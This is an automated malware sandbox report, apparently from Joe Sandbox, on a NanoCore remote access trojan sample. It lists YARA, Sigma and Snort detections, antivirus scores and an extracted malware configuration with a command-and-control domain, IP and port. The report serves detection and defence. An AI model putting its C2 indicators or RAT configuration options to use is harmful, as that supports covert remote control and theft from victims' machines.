1.2.jqenyeo.exe.21c1658.1.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
1.2.jqenyeo.exe.21c1658.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.0.jqenyeo.exe.400000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x217e5:$x1: NanoCore.ClientPluginHost 0x21822:$x2: IClientNetworkHost 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.jqenyeo.exe.400000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2155d:$x1: NanoCore Client.exe 0x217e5:$x2: NanoCore.ClientPluginHost 0x22e1e:$s1: PluginCommand 0x22e12:$s2: FileCommand 0x23cc3:$s3: PipeExists 0x29a7a:$s4: PipeCreated 0x2180f:$s5: IClientLoggingHost
3.0.jqenyeo.exe.400000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.jqenyeo.exe.400000.6.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2154d:$x1: NanoCore Client 0x2155d:$x1: NanoCore Client 0x217a5:$x2: NanoCore.ClientPlugin 0x217e5:$x3: NanoCore.ClientPluginHost 0x2179a:$i1: IClientApp 0x217bb:$i2: IClientData 0x217c7:$i3: IClientNetwork 0x217d6:$i4: IClientAppHost 0x217ff:$i5: IClientDataHost 0x2180f:$i6: IClientLoggingHost 0x21822:$i7: IClientNetworkHost 0x21835:$i8: IClientUIHost 0x21843:$i9: IClientNameObjectCollection 0x2185f:$i10: IClientReadOnlyNameObjectCollection 0x215ac:$s1: ClientPlugin 0x217ae:$s1: ClientPlugin 0x21ca2:$s2: EndPoint 0x21cab:$s3: IPAddress 0x21cb5:$s4: IPEndPoint 0x236eb:$s6: get_ClientSettings 0x23c8f:$s7: get_Connected
3.0.jqenyeo.exe.400000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2154d:$a: NanoCore 0x2155d:$a: NanoCore 0x21791:$a: NanoCore 0x217a5:$a: NanoCore 0x217e5:$a: NanoCore 0x215ac:$b: ClientPlugin 0x217ae:$b: ClientPlugin 0x217ee:$b: ClientPlugin 0x216d3:$c: ProjectData 0x220da:$d: DESCrypto 0x29aa6:$e: KeepAlive 0x27a94:$g: LogClientMessage 0x23c8f:$i: get_Connected 0x22410:$j: #=q 0x22440:$j: #=q 0x2245c:$j: #=q 0x2248c:$j: #=q 0x224a8:$j: #=q 0x224c4:$j: #=q 0x224f4:$j: #=q 0x22510:$j: #=q
3.0.jqenyeo.exe.400000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x217e5:$x1: NanoCore.ClientPluginHost 0x21822:$x2: IClientNetworkHost 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.jqenyeo.exe.400000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2155d:$x1: NanoCore Client.exe 0x217e5:$x2: NanoCore.ClientPluginHost 0x22e1e:$s1: PluginCommand 0x22e12:$s2: FileCommand 0x23cc3:$s3: PipeExists 0x29a7a:$s4: PipeCreated 0x2180f:$s5: IClientLoggingHost
3.0.jqenyeo.exe.400000.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.jqenyeo.exe.400000.7.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2154d:$x1: NanoCore Client 0x2155d:$x1: NanoCore Client 0x217a5:$x2: NanoCore.ClientPlugin 0x217e5:$x3: NanoCore.ClientPluginHost 0x2179a:$i1: IClientApp 0x217bb:$i2: IClientData 0x217c7:$i3: IClientNetwork 0x217d6:$i4: IClientAppHost 0x217ff:$i5: IClientDataHost 0x2180f:$i6: IClientLoggingHost 0x21822:$i7: IClientNetworkHost 0x21835:$i8: IClientUIHost 0x21843:$i9: IClientNameObjectCollection 0x2185f:$i10: IClientReadOnlyNameObjectCollection 0x215ac:$s1: ClientPlugin 0x217ae:$s1: ClientPlugin 0x21ca2:$s2: EndPoint 0x21cab:$s3: IPAddress 0x21cb5:$s4: IPEndPoint 0x236eb:$s6: get_ClientSettings 0x23c8f:$s7: get_Connected
3.0.jqenyeo.exe.400000.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2154d:$a: NanoCore 0x2155d:$a: NanoCore 0x21791:$a: NanoCore 0x217a5:$a: NanoCore 0x217e5:$a: NanoCore 0x215ac:$b: ClientPlugin 0x217ae:$b: ClientPlugin 0x217ee:$b: ClientPlugin 0x216d3:$c: ProjectData 0x220da:$d: DESCrypto 0x29aa6:$e: KeepAlive 0x27a94:$g: LogClientMessage 0x23c8f:$i: get_Connected 0x22410:$j: #=q 0x22440:$j: #=q 0x2245c:$j: #=q 0x2248c:$j: #=q 0x224a8:$j: #=q 0x224c4:$j: #=q 0x224f4:$j: #=q 0x22510:$j: #=q
3.0.jqenyeo.exe.400000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x217e5:$x1: NanoCore.ClientPluginHost 0x21822:$x2: IClientNetworkHost 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.jqenyeo.exe.400000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2155d:$x1: NanoCore Client.exe 0x217e5:$x2: NanoCore.ClientPluginHost 0x22e1e:$s1: PluginCommand 0x22e12:$s2: FileCommand 0x23cc3:$s3: PipeExists 0x29a7a:$s4: PipeCreated 0x2180f:$s5: IClientLoggingHost
3.0.jqenyeo.exe.400000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.jqenyeo.exe.400000.5.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2154d:$x1: NanoCore Client 0x2155d:$x1: NanoCore Client 0x217a5:$x2: NanoCore.ClientPlugin 0x217e5:$x3: NanoCore.ClientPluginHost 0x2179a:$i1: IClientApp 0x217bb:$i2: IClientData 0x217c7:$i3: IClientNetwork 0x217d6:$i4: IClientAppHost 0x217ff:$i5: IClientDataHost 0x2180f:$i6: IClientLoggingHost 0x21822:$i7: IClientNetworkHost 0x21835:$i8: IClientUIHost 0x21843:$i9: IClientNameObjectCollection 0x2185f:$i10: IClientReadOnlyNameObjectCollection 0x215ac:$s1: ClientPlugin 0x217ae:$s1: ClientPlugin 0x21ca2:$s2: EndPoint 0x21cab:$s3: IPAddress 0x21cb5:$s4: IPEndPoint 0x236eb:$s6: get_ClientSettings 0x23c8f:$s7: get_Connected
3.0.jqenyeo.exe.400000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2154d:$a: NanoCore 0x2155d:$a: NanoCore 0x21791:$a: NanoCore 0x217a5:$a: NanoCore 0x217e5:$a: NanoCore 0x215ac:$b: ClientPlugin 0x217ae:$b: ClientPlugin 0x217ee:$b: ClientPlugin 0x216d3:$c: ProjectData 0x220da:$d: DESCrypto 0x29aa6:$e: KeepAlive 0x27a94:$g: LogClientMessage 0x23c8f:$i: get_Connected 0x22410:$j: #=q 0x22440:$j: #=q 0x2245c:$j: #=q 0x2248c:$j: #=q 0x224a8:$j: #=q 0x224c4:$j: #=q 0x224f4:$j: #=q 0x22510:$j: #=q
Click to see the 45 entries

Sigma Signatures

AV Detection

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud

Sigma detected: NanoCore

Source: File created

Stealing of Sensitive Information

Sigma detected: NanoCore

Source: File created

Remote Access Functionality

Sigma detected: NanoCore

Source: File created

Snort Signatures

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414977627022816766 05/17/22-12:14:39.410802
SID:	2816766
Source Port:	49776
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976827022025019 05/17/22-12:14:22.484039
SID:	2025019
Source Port:	49768
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976627022816766 05/17/22-12:14:10.385891
SID:	2816766
Source Port:	49766
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414975327022816766 05/17/22-12:13:17.032873
SID:	2816766
Source Port:	49753
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976127022025019 05/17/22-12:13:48.368799
SID:	2025019
Source Port:	49761
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414975827022025019 05/17/22-12:13:28.167370
SID:	2025019
Source Port:	49758
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976327022816766 05/17/22-12:14:04.353308
SID:	2816766
Source Port:	49763
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414974627022816766 05/17/22-12:13:08.303726
SID:	2816766
Source Port:	49746
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414977427022025019 05/17/22-12:14:28.783170
SID:	2025019
Source Port:	49774
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414975927022025019 05/17/22-12:13:35.677991
SID:	2025019
Source Port:	49759
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976227022025019 05/17/22-12:13:55.935835
SID:	2025019
Source Port:	49762
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414975927022816766 05/17/22-12:13:37.610009
SID:	2816766
Source Port:	49759
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) - Source IP: 185.19.85.141 - Destination IP: 192.168.2.3

Timestamp:	185.19.85.141192.168.2.32702497772841753 05/17/22-12:14:49.052826
SID:	2841753
Source Port:	2702
Destination Port:	49777
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT Keep-Alive Beacon - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414974627022816718 05/17/22-12:13:08.062740
SID:	2816718
Source Port:	49746
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976027022816766 05/17/22-12:13:43.986891
SID:	2816766
Source Port:	49760
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT Keep-Alive Beacon - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976627022816718 05/17/22-12:14:09.332904
SID:	2816718
Source Port:	49766
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414974627022025019 05/17/22-12:13:06.238856
SID:	2025019
Source Port:	49746
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414977427022816766 05/17/22-12:14:31.555929
SID:	2816766
Source Port:	49774
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414975327022025019 05/17/22-12:13:12.793529
SID:	2025019
Source Port:	49753
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414974327022025019 05/17/22-12:13:00.042311
SID:	2025019
Source Port:	49743
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976327022025019 05/17/22-12:14:02.189654
SID:	2025019
Source Port:	49763
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976827022816766 05/17/22-12:14:24.492812
SID:	2816766
Source Port:	49768
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414975827022816766 05/17/22-12:13:30.051681
SID:	2816766
Source Port:	49758
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976127022816766 05/17/22-12:13:50.122915
SID:	2816766
Source Port:	49761
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976627022025019 05/17/22-12:14:08.849775
SID:	2025019
Source Port:	49766
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414977627022025019 05/17/22-12:14:37.723918
SID:	2025019
Source Port:	49776
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414977727022816766 05/17/22-12:14:44.772947
SID:	2816766
Source Port:	49777
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976727022816766 05/17/22-12:14:17.723901
SID:	2816766
Source Port:	49767
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414975727022025019 05/17/22-12:13:21.755444
SID:	2025019
Source Port:	49757
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976027022025019 05/17/22-12:13:42.065696
SID:	2025019
Source Port:	49760
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414975727022816766 05/17/22-12:13:23.742694
SID:	2816766
Source Port:	49757
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976227022816766 05/17/22-12:13:57.882898
SID:	2816766
Source Port:	49762
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414976727022025019 05/17/22-12:14:15.714757
SID:	2025019
Source Port:	49767
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT Keepalive Response 1 - Source IP: 185.19.85.141 - Destination IP: 192.168.2.3

Timestamp:	185.19.85.141192.168.2.32702497582810290 05/17/22-12:13:29.940778
SID:	2810290
Source Port:	2702
Destination Port:	49758
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414974327022816766 05/17/22-12:13:01.734611
SID:	2816766
Source Port:	49743
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 185.19.85.141

Timestamp:	192.168.2.3185.19.85.1414977727022025019 05/17/22-12:14:43.866227
SID:	2025019
Source Port:	49777
Destination Port:	2702
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "b07368c6-c9e6-43bc-939d-00b8dbf6", "Group": "Memphis", "Domain1": "stonecold.ddns.net", "Domain2": "stonecold.ddns.net", "Port": 2702, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for submitted file

Source: xeWd55M5Lb.exe	Virustotal: Detection: 49%			Perma Link
Source: xeWd55M5Lb.exe	ReversingLabs: Detection: 48%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	ReversingLabs: Detection: 23%

Yara detected Nanocore RAT

Source: Yara match	File source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR

Machine Learning detection for sample

Source: xeWd55M5Lb.exe

Joe Sandbox ML: detected

Source: 6.2.ltqmdmdi.exe.400000.0.unpack	Avira: Label: TR/Crypt.EPACK.Gen2
Source: 17.0.ltqmdmdi.exe.400000.2.unpack	Avira: Label: TR/Crypt.EPACK.Gen2
Source: 17.2.ltqmdmdi.exe.400000.0.unpack	Avira: Label: TR/Crypt.EPACK.Gen2
Source: 3.0.jqenyeo.exe.400000.6.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.jqenyeo.exe.400000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.jqenyeo.exe.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.jqenyeo.exe.400000.9.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.0.jqenyeo.exe.400000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.0.ltqmdmdi.exe.400000.1.unpack	Avira: Label: TR/Crypt.EPACK.Gen2
Source: 1.2.jqenyeo.exe.400000.0.unpack	Avira: Label: TR/Crypt.EPACK.Gen2
Source: 3.0.jqenyeo.exe.400000.5.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.0.ltqmdmdi.exe.400000.0.unpack	Avira: Label: TR/Crypt.EPACK.Gen2

Source: xeWd55M5Lb.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: xeWd55M5Lb.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: jqenyeo.exe, 00000001.00000003.285113865.00000000025B0000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000001.00000003.281647167.0000000002740000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: jqenyeo.exe, 00000001.00000003.285113865.00000000025B0000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000001.00000003.281647167.0000000002740000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49743 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49743 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49746 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49746 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.2.3:49746 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49753 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49753 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49757 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49757 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49758 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49758 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 185.19.85.141:2702 -> 192.168.2.3:49758
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49759 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49759 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49760 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49760 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49761 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49761 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49762 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49762 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49763 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49763 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49766 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49766 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.2.3:49766 -> 185.19.85.141:2702
